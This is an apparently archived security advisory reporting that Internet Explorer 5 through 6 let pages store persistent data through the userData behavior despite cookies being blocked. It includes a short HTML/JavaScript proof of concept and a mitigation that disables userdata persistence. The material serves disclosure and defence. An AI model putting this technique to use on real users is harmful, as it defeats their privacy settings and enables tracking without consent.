COMMAND

	IE cookie restrictions bypassed via active scripting

SYSTEMS AFFECTED

	 Internet explorer 5

	 Internet explorer 5.5

	 Internet explorer 6

	

PROBLEM

	From Jelmer advisory [http://www.xs4all.nl/~jkuperus] :
	

	Bypassing cookie restrictions in IE 5+6
	

	 Demonstration

	 =============

	

	First disable cookies by (on ie6 at least this is  the  way  to  do  it)
	going to tools > privacy then set it to block all.
	

	goto http://www.xs4all.nl/~jkuperus/cookies.htm for an example  ,  enter
	a value press save
	

	close the  browser  reopen  the  page  and  press  load,  the  value  is
	preserved
	

	

	<html>

	<head>

	<style>

	   .storeuserData {behavior:url(#default#userData);}

	</STYLE>

	<script>

	

	function fnSaveInput(){

	   var oPersist=oPersistForm.oPersistInput;

	   oPersist.setAttribute("sPersist",oPersist.value);

	   oPersist.save("oXMLBranch");

	}

	

	function fnLoadInput(){

	   var oPersist=oPersistForm.oPersistInput;

	   oPersist.load("oXMLBranch");

	   oPersist.value=oPersist.getAttribute("sPersist");

	}

	

	

	</SCRIPT>

	</head>

	<body>

	<form ID="oPersistForm">

	<input CLASS="storeuserData" TYPE="text" ID="oPersistInput">

	<input TYPE="button" VALUE="Load" onclick="fnLoadInput()">

	<input TYPE="button" VALUE="Save" onclick="fnSaveInput()">

	</form>

	</body>

	</html>

	

SOLUTION

	disable active scripting or If you turn off userdata persistence in  the
	security zone, you can completely turn off userdata.
	

	Tools|Internet Options

	  Security Tab

	  Custom Level Button

	    <last option in Miscellaneous>

	    Userdata persistence

	      <set to>Disable